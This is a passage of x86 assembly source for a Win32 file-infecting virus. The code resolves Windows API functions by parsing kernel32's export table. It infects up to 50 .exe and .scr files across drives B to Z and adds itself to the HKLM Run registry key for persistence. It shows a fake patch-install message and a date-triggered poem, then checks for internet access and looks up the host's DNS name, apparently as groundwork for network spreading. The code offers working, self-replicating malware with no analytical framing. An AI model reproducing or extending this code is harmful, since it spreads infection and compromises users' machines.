    mov     esi, [esi+16]
    add     esi, eax
    rep     lodsd

    ; create the string "kernel32.dll" on the stack
    push    0
    push    dword ptr 'lld.'
    push    dword ptr '23le'
    push    dword ptr 'nrek'
      
    ; call GetModuleHandleA to retrieve the address of the kernel32.dll
    push    esp
    call    eax
                  
    mov     [ebp+lpKernel32], eax                  ; save the kernel32 address 

    ; get the address of the GetProcAddress API function
    mov     ebx, [eax+3ch]        
    add     ebx, eax
    mov     ebx, [ebx+120]                         ; get the export table VA                         
    add     ebx, eax
    mov     esi, [ebx+28]                          ; get the VA of the address table
    add     esi, eax
    mov     edi, [ebx+32]                          ; get the VA of the name table
    add     edi, eax
    mov     ecx, [ebx+36]                          ; get the VA of the ordinal table                           
    add     ecx, eax       
findGetProcAddress:        
    add     ecx, 2                                 ; next ordinal
    add     edi, 4                                 ; next name
    mov     edx, [edi]    
    add     edx, eax 
    cmp     dword ptr [edx], 'PteG'
    jne     findGetProcAddress
    cmp     dword ptr [edx+4], 'Acor'              ; GetProcAddress?
    jne     findGetProcAddress
    mov     cx, [ecx]
    and     ecx, 0FFFFh
    add     ecx, [ebx+16]                          ; add ordinal base
    rep     lodsd                                  ; get the VA address corrasponding to the ordinal 
    add     eax, [ebp+lpKernel32]
    mov     [ebp+GetProcAddress], eax

    ; get the address of the LoadLibraryA API function
    pushptr szLoadLibraryA
    pushval lpKernel32     
    ApiCall GetProcAddress
    mov     [ebp+LoadLibraryA], eax

    ; load the Windows 9x API functions
    lea     eax, [ebp+API_Imports_9x]
    call    LoadImports  
    cmp     eax, -1
    je      apiLoadError

    ; create a thread to execute the rest of the code
    pushptr hThread
    push    0
    push    ebp                                    ; pass the delta pointer to the thread 
    pushptr background
    push    0
    push    0
    ApiCall CreateThread

    ; if /iKX is present in the command line then loop until the thread closes
    ApiCall GetCommandLineA
    mov     ecx, 256
parseCommandLine:
    cmp     dword ptr [eax], 'XKi/'
    je      wait
    inc     eax
    loop    parseCommandLine

    ; if this is not the first generation then return control to the host
    cmp      ebp, 0
    jne      returnHostControl    

    ; if this is the first generation then loop until the thread closes
wait:
    cmp     [ebp+dwThreadStatus], EXIT_THREAD
    jne     wait
    push    0
    ApiCall ExitProcess

    ; return control to the host
returnHostControl:
    mov     eax, [ebp+lpReturnAddress]
    add     eax, [ebp+lpImageBase]
    push    eax
    ret

    ; if an api function cannot be loaded then either return control to the host or exit program
apiLoadError:
    cmp     ebp, 0
    jne     returnHostControl
    push    0
    ApiCall ExitProcess    

;-------------------------------------------------------------------------------------------------;
; Background Thread.                                                                              ;
;-------------------------------------------------------------------------------------------------;

background:

    mov     ebp, [esp+4]                           ; restore the delta offset      

;-------------------------------------------------------------------------------------------------;
; Infect 50 files in drives B-Z, except the CD-ROM drive.                                         ;
;-------------------------------------------------------------------------------------------------;

    xor     esi, esi                               ; files infected counter
    mov     byte ptr [ebp+szDrive], 'A'            ; set the drive to start searching at
nextDrive:
    inc     byte ptr [ebp+szDrive]                 ; next drive
    cmp     byte ptr [ebp+szDrive], 'Z'+1          ; all drives searched?
    je      payload
    pushptr szDrive
    ApiCall GetDriveTypeA 
    cmp     eax, DRIVE_CDROM                       ; CD-ROM drive?
    je      nextDrive
    pushptr szDrive
    ApiCall SetCurrentDirectoryA                   ; set the current directory to the root of that drive
    cmp     eax, 0
    je      nextDrive    
    
findFiles:
    mov     edi, esp                               ; save the stack pointer
    push    0BAADF00Dh                             ; end of files marker
findFirstFile:
    pushptr win32FindData
    pushptr szSearchString
    ApiCall FindFirstFileA                         ; find the first file
    mov     [ebp+hFind], eax    
checkType:
    cmp     eax, 0
    je      downDirectory
    cmp     byte ptr [ebp+win32FindData.FullFileName], '.'
    je      findNextFile
    cmp     [ebp+win32FindData.FileAttributes], 10h
    je      upDirectory
    cmp     [ebp+win32FindData.FileAttributes], 30h
    je      upDirectory

    ; check the file extension for .exe or .scr
    push    edi
    mov     al, '.'
    mov     ecx, 260
    lea     edi, [ebp+win32FindData.FullFileName]
    repne   scasb                                  ; seek to the file extension
    mov     eax, [edi-1]
    pop     edi
    and     eax, 0DFDFDFFFh                        ; make upper case
    cmp     eax, 'EXE.'                            ; executable file?
    je      infectFile  
    cmp     eax, 'RCS.'                            ; screen saver?
    je      infectFile
    jmp     findNextFile    

infectFile: 

    ; check to see if the file is a valid PE executable and is not already infected
    push    esi
    push    edi
    lea     esi, [ebp+win32FindData.FullFileName]
    call    IsValid
    pop     edi
    pop     esi
    cmp     eax, -1
    je      findNextFile

    ; if the executable file is in the system directory then dont infect it
    push    256
    pushptr szSystemDirectory
    ApiCall GetSystemDirectoryA
    pushptr szSystemDirectory
    ApiCall CharUpperA
    pushptr szCurrentDirectory
    push    256
    ApiCall GetCurrentDirectoryA
    pushptr szCurrentDirectory
    ApiCall CharUpperA
    pushptr szSystemDirectory
    pushptr szCurrentDirectory
    ApiCall lstrcmpA
    cmp     eax, 0
    je      findNextFile

    ; infect the file
    push    esi
    lea     esi, [ebp+win32FindData.FullFileName]
    call    AttachCode
    pop     esi
    cmp     eax, -1
    je      findNextFile 
    
    ; increment the file infection counter
    inc     esi
    cmp     esi, 50                                ; infect 50 files
    jne     findNextFile

    ; if 50 files have been infected stop searching 
    mov     esp, edi
    jmp     searchComplete

findNextFile:
    pushptr win32FindData
    pushval hFind
    ApiCall FindNextFileA                          ; find the next file    
    jmp     checkType

upDirectory:   
    pushptr win32FindData.FullFileName
    ApiCall SetCurrentDirectoryA
    cmp     eax, 0
    je      findNextFile
    pushval hFind                                  ; save the find handle
    jmp     findFirstFile    

downDirectory:
    pushptr szBackDir
    ApiCall SetCurrentDirectoryA
    pushval hFind
    ApiCall FindClose                              ; close the find handle
    pop     [ebp+hFind]                            ; restore the previous find handle
    cmp     [ebp+hFind], 0BAADF00Dh                ; no more files left to find?
    jne     findNextFile        
    mov     esp, edi                               ; restore the stack pointer
    jmp     nextDrive                              ; find another drive to infect
searchComplete:

;-------------------------------------------------------------------------------------------------;
; Make it so the last infected file runs on start-up.                                             ;
;-------------------------------------------------------------------------------------------------;

    ; copy the current path to a buffer
    pushptr szCurrentDirectory
    pushptr szModuleName
    ApiCall lstrcpyA

    ; append a slash
    pushptr szSlash
    pushptr szModuleName
    ApiCall lstrcatA   

    ; append the executable file name
    pushptr win32FindData.FullFileName
    pushptr szModuleName
    ApiCall lstrcatA

    ; concat the commandline parameter /iKX to the key value
    pushptr szIkxParameter
    pushptr szModuleName
    ApiCall lstrcatA

    ; open "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
    pushptr hKey                           
    pushptr szSubKey                        
    push    HKEY_LOCAL_MACHINE               
    ApiCall RegOpenKeyA
    cmp     eax, 0
    jne     exitThread

    ; get the length of the module name
    pushptr szModuleName
    ApiCall lstrlenA

    ; set the start-up program
    push    eax                                
    pushptr szModuleName
    push    REG_SZ                     
    push    0                            
    pushptr szValueName                 
    pushval hKey                        
    ApiCall RegSetValueExA             
              
    ; close the key
    pushval hKey
    ApiCall RegCloseKey

;-------------------------------------------------------------------------------------------------;
; Display the patch install message if the module name is "patch110.exe"                          ;
;-------------------------------------------------------------------------------------------------;

    ; get the path and name of this program
    push    256
    pushptr szModuleName
    push    0
    ApiCall GetModuleFileNameA    

    ; seek to a dot
    lea     edi, [ebp+szModuleName]
    mov     al, '.'
    mov     ecx, 256
    repne   scasb  
    
    ; seek backwards to a slash
    std
    mov     al, '\'
    repne   scasb
    cld
    add     edi, 2

    ; compair the filename to "patch110.exe"
    mov     ecx, 12
    lea     esi, [ebp+szPatchName] 
    rep     cmpsb
    cmp     ecx, 0
    jne     payload  

    ; display the patch install message
    push    0
    pushptr szPatchTitle
    pushptr szPatchInstall
    push    0
    ApiCall MessageBoxA

;-------------------------------------------------------------------------------------------------;
; Display a poem by John Keats on the day of his death.                                           ;
;-------------------------------------------------------------------------------------------------;

payload:

    ; get today's date
    pushptr date
    ApiCall GetSystemTime 

    ; Feb 23?
    cmp     [ebp+date.wMonth], 2
    jne     loadImports     
    cmp     word ptr [ebp+date.wDay], 24
    jne     loadImports

    ; display poem
    push    0
    pushptr szTitle
    pushptr szElginMarbles
    push    0
    ApiCall MessageBoxA

;-------------------------------------------------------------------------------------------------;
; Load the Windows 2k Imports.                                                                    ;
;-------------------------------------------------------------------------------------------------;

loadImports:

    ; Windows 2k+ OS?
    ApiCall GetVersion
    cmp     al, 5
    jl      exitThread

    ; load the Windows 2k API functions
    lea     eax, [ebp+API_Imports_2k]
    call    LoadImports
    cmp     eax, -1
    je      exitThread

    ; internet connection?
    push    0
    pushptr dwConnectionState
    ApiCall InternetGetConnectedState
    cmp     eax, FALSE
    je      exitThread

;-------------------------------------------------------------------------------------------------;
; Get the IP address of this computer.                                                            ;
;-------------------------------------------------------------------------------------------------;

    ; initialize winsock
    pushptr wsaData
    push    0101h
    ApiCall WSAStartup
    cmp     eax, 0
    jne     exitThread

    ; get the local host name of this computer
    push    132
    pushptr szHostName
    ApiCall gethostname
    cmp     eax, 0
    jne     exitThread

    ; clear the reverse IP buffer
    push    29
    pushptr szReverseIP
    ApiCall RtlZeroMemory

    ; get the IP address of the local host
    pushptr szHostName
    ApiCall gethostbyname
    cmp     eax, 0
    je      exitThread
    mov     eax, [eax+12]
    mov     eax, [eax]
    mov     eax, [eax]

;-------------------------------------------------------------------------------------------------;
; Get the host name of this computer.                                                             ;
;-------------------------------------------------------------------------------------------------;

getHostName:

    bswap   eax                                    ; reverse the byte order of the IP
        
    ; convert the IP address to a string
    push    eax
    ApiCall inet_ntoa

    ; copy the reverse IP string to the buffer
    push    eax
    pushptr szReverseIP
    ApiCall lstrcpyA

    ; concat the .in-addr.arpa string
    pushptr szArpa
    pushptr szReverseIP
    ApiCall lstrcatA

    ; query a DNS server for the host name of this computer
    push    0
    pushptr lpResults
    push    0
    push    DNS_QUERY_STANDARD
    push    DNS_TYPE_PTR
    pushptr szReverseIP
    ApiCall DnsQuery_A
    cmp     eax, 0
    jne     exitThread
    
    ; was an answer record found?
    push    size DNS_RECORD
    pushval lpResults
    pushptr dnsRecordHeader
    ApiCall RtlMoveMemory
    mov     eax, [ebp+dnsRecordHeader.flags]
    and     al, 00000011b
    cmp     al, DNSREC_ANSWER
    jne     exitThread
